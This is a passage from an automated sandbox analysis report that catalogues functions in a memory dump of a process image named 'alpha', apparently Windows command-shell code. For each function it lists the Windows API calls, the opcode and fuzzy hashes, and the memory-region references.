                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
                                      • String ID:
                                      • API String ID: 4291973834-0
                                      • Opcode ID: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                      • Instruction ID: 2335df1199ad318f74c5eae0fc773c3075df21977897c4360f65a0b77039ad75
                                      • Opcode Fuzzy Hash: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                      • Instruction Fuzzy Hash: 3D41B9EFE0868386E691FB10E940279A2A0AF44F6CFC80436D94D876A1DF7DEC448660
                                      Function 00007FF755CB4A14 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1207 7ff755cb4a14-7ff755cb4a3e GetEnvironmentStringsW 1208 7ff755cb4a40-7ff755cb4a46 1207->1208 1209 7ff755cb4aae-7ff755cb4ac5 1207->1209 1210 7ff755cb4a59-7ff755cb4a8f GetProcessHeap HeapAlloc 1208->1210 1211 7ff755cb4a48-7ff755cb4a52 1208->1211 1213 7ff755cb4a91-7ff755cb4a9a memmove 1210->1213 1214 7ff755cb4a9f-7ff755cb4aa9 FreeEnvironmentStringsW 1210->1214 1211->1211 1212 7ff755cb4a54-7ff755cb4a57 1211->1212 1212->1210 1212->1211 1213->1214 1214->1209
                                      APIs
                                      • GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4A28
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4A66
                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4A7D
                                      • memmove.MSVCRT(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4A9A
                                      • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4AA2
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: EnvironmentHeapStrings$AllocFreeProcessmemmove
                                      • String ID:
                                      • API String ID: 1623332820-0
                                      • Opcode ID: 7b7d5cd90c4b7fc4a2429fe2183f3170931abb96c0362b724e039f9c86480d2b
                                      • Instruction ID: ee96a19b9fa0f1cc9fffb79ea2662411ed397d94518712410385f165bd0d9323
                                      • Opcode Fuzzy Hash: 7b7d5cd90c4b7fc4a2429fe2183f3170931abb96c0362b724e039f9c86480d2b
                                      • Instruction Fuzzy Hash: B81194ABA18B8382DE50AB41A404039FBA1EB89F94BCD9035DE4E03744DE3DE8418760
                                      Function 00007FF755CB5CB4 Relevance: 7.5, APIs: 5, Instructions: 36synchronizationCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
                                      • String ID:
                                      • API String ID: 1826527819-0
                                      • Opcode ID: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                      • Instruction ID: 571ab0044a63b28afc6e93d8ac93c660179a7cfbd2b90d0ef0b0643428252375
                                      • Opcode Fuzzy Hash: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                      • Instruction Fuzzy Hash: 7F015BBA9086838AE6407B24A4451B9FF60EB8EF69FC86130D54F46395CF3C94448B20
                                      Function 00007FF755CB3060 Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00007FF755CB1EA0: wcschr.MSVCRT(?,?,?,00007FF755CA286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF755CD0D54), ref: 00007FF755CB1EB3
                                      • SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF755CA92AC), ref: 00007FF755CB30CA
                                      • SetErrorMode.KERNELBASE ref: 00007FF755CB30DD
                                      • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF755CB30F6
                                      • SetErrorMode.KERNELBASE ref: 00007FF755CB3106
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: ErrorMode$FullNamePathwcschr
                                      • String ID:
                                      • API String ID: 1464828906-0
                                      • Opcode ID: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                      • Instruction ID: aadf6ab21e20f87c1b43e20b080568f2d70318039600faa5db4c2cf0229446d1
                                      • Opcode Fuzzy Hash: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                      • Instruction Fuzzy Hash: C531D3ABE0865382E764AF15A44007EF661EB46FA8FDC9234DA5A433D0EE7DEC458310
                                      Function 00007FF755CACA40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memset
                                      • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                      • API String ID: 2221118986-3416068913
                                      • Opcode ID: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                      • Instruction ID: 9480f50401eb63d477c8859848da6b64336bdd9db7cef6448b0f6c72183955dc
                                      • Opcode Fuzzy Hash: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                      • Instruction Fuzzy Hash: 3411CAABA1864781EB90EB55E144279A6909F84FA8F9C4731ED6D4B7D5DD2CD8804320
                                      Function 00007FF755CABE00 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 120COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memsetwcschr
                                      • String ID: 2$COMSPEC
                                      • API String ID: 1764819092-1738800741
                                      • Opcode ID: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                      • Instruction ID: 662b3d5409abe09da91de2967998a9e08c64981624db127003399d2cf7f84a53
                                      • Opcode Fuzzy Hash: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                      • Instruction Fuzzy Hash: 51519EBFA0864785FB70BB21D841379EB919F45F8CF8C4835DA0D466D6DE6CE8408760
                                      Function 00007FF755CB2EFC Relevance: 4.6, APIs: 3, Instructions: 101COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: wcschr$ErrorFileFindFirstLastwcsrchr
                                      • String ID:
                                      • API String ID: 4254246844-0
                                      • Opcode ID: 957b6616a90fc8dff72bb369af8d616d7be4d88c64500895f40bc219e0b26270
                                      • Instruction ID: 079cbb35de01beabb00a3983ac20bd906b55bab50d1797c23c58b4b7e1a6c5e7
                                      • Opcode Fuzzy Hash: 957b6616a90fc8dff72bb369af8d616d7be4d88c64500895f40bc219e0b26270
                                      • Instruction Fuzzy Hash: 9E41B4ABA0874386EE20AB50E444379F7A0EF85FA8FDC4535DA4E47791DE3CE8458621
                                      Function 00007FF755CB498C Relevance: 4.5, APIs: 3, Instructions: 33memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heap$EnvironmentFreeProcessVariable
                                      • String ID:
                                      • API String ID: 2643372051-0
                                      • Opcode ID: 49892fdbdbb93a03844bd16286cde042899f8d20c3c19ceaef7f6d70d853aae3
                                      • Instruction ID: 06eddbe180d11163b964c505e91ec28edcd14a2119231e091c34419f617a7a3f
                                      • Opcode Fuzzy Hash: 49892fdbdbb93a03844bd16286cde042899f8d20c3c19ceaef7f6d70d853aae3
                                      • Instruction Fuzzy Hash: B1F062A7A19B8385EA40AB65A544075EAA1FF5AFA4BCE9274C52E43390DE3C94848250
                                      Function 00007FF755CB5A68 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: _get_osfhandle$ConsoleMode
                                      • String ID:
                                      • API String ID: 1591002910-0
                                      • Opcode ID: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                      • Instruction ID: 67575a527bb5efb5466e517999647032b9c05da1353cf30e2682f441c974d32b
                                      • Opcode Fuzzy Hash: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                      • Instruction Fuzzy Hash: A9F07ABAA09783CBE645AB11E845078FBA1FB89F19F984138C90E47320DF3CA4159B50
                                      Function 00007FF755CB291C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: DriveType
                                      • String ID: :
                                      • API String ID: 338552980-336475711
                                      • Opcode ID: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                      • Instruction ID: 2d0016b0763a197c1f25ec152b19339566973f95dd34a8cf6da0d82f619cd5d3
                                      • Opcode Fuzzy Hash: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                      • Instruction Fuzzy Hash: 1EE06DAB618641C6E720AB60E45106AF7A0FB8DB58FC81525EA8D83724DB3CD249CB18
                                      Function 00007FF755CB5AD8 Relevance: 3.1, APIs: 2, Instructions: 93COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00007FF755CACD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CAB9A1,?,?,?,?,00007FF755CAD81A), ref: 00007FF755CACDA6
                                        • Part of subcall function 00007FF755CACD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CAB9A1,?,?,?,?,00007FF755CAD81A), ref: 00007FF755CACDBD
                                      • GetConsoleTitleW.KERNELBASE ref: 00007FF755CB5B52
                                        • Part of subcall function 00007FF755CB4224: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF755CB4297
                                        • Part of subcall function 00007FF755CB4224: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF755CB42D7
                                        • Part of subcall function 00007FF755CB4224: memset.MSVCRT ref: 00007FF755CB42FD
                                        • Part of subcall function 00007FF755CB4224: memset.MSVCRT ref: 00007FF755CB4368
                                        • Part of subcall function 00007FF755CB4224: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF755CB4380
                                        • Part of subcall function 00007FF755CB4224: wcsrchr.MSVCRT ref: 00007FF755CB43E6
                                        • Part of subcall function 00007FF755CB4224: lstrcmpW.KERNELBASE ref: 00007FF755CB4401
                                      • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF755CB5BC7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memset$AttributeConsoleHeapProcThreadTitlewcsrchr$AllocInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmpwcschr
                                      • String ID:
                                      • API String ID: 497088868-0
                                      • Opcode ID: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                      • Instruction ID: 95d59afd5feec4c2b001340e9742b648a7e3289d150dc7d3ccd9095fd8b9787b
                                      • Opcode Fuzzy Hash: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                      • Instruction Fuzzy Hash: EF31B5BAB0C64342FA24B711A45117DE291FF89F98FCC5435E94E87B85EE3CE8018720
                                      Function 00007FF755CB9A6C Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Concurrency::cancel_current_taskmalloc
                                      • String ID:
                                      • API String ID: 1412018758-0
                                      • Opcode ID: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                      • Instruction ID: f090eb7926ce24c860bcb84f1e542b3b97e04b2420b2439611bfda745a8b02d0
                                      • Opcode Fuzzy Hash: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                      • Instruction Fuzzy Hash: 65E092CBF5930791FE143B62684117892405F18F68FCC2430CD0E09782EE2CF8918330
                                      Function 00007FF755CACD90 Relevance: 2.5, APIs: 2, Instructions: 30memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CAB9A1,?,?,?,?,00007FF755CAD81A), ref: 00007FF755CACDA6
                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CAB9A1,?,?,?,?,00007FF755CAD81A), ref: 00007FF755CACDBD
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heap$AllocProcess
                                      • String ID:
                                      • API String ID: 1617791916-0
                                      • Opcode ID: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                      • Instruction ID: 44706e5a77077c0b5c8ddf152b709d7bc288a67bd0d79f9e1579c805c9462ec3
                                      • Opcode Fuzzy Hash: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                      • Instruction Fuzzy Hash: EDF019BBE18A8386EA45AB15F84007CFBA1FB89F44BDD9438D90E43354DF7CA481C620
                                      Function 00007FF755CB4C1C Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: exit
                                      • String ID:
                                      • API String ID: 2483651598-0
                                      • Opcode ID: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                      • Instruction ID: 81f9d75822dda14730cadf88005f73625eb9b3c07ad1d6ce190c222bdd2c60bb
                                      • Opcode Fuzzy Hash: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                      • Instruction Fuzzy Hash: 4DC0127670874747EB5C7731249103999555B09F15F885478C50681281DD6CDC048214
                                      Function 00007FF755CB5508 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: DefaultUser
                                      • String ID:
                                      • API String ID: 3358694519-0
                                      • Opcode ID: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                      • Instruction ID: 97cec5db0f111e631af2bdd3643167faf7dbcda2662f1e2541dad4e1271ff61d
                                      • Opcode Fuzzy Hash: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                      • Instruction Fuzzy Hash: 15E02BFBD082938BF5943B4164413B49953CB78FA7FCC4031C70E022C4ED2D2E456628
                                      Function 00007FF755CB2E44 Relevance: 1.3, APIs: 1, Instructions: 29COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memset
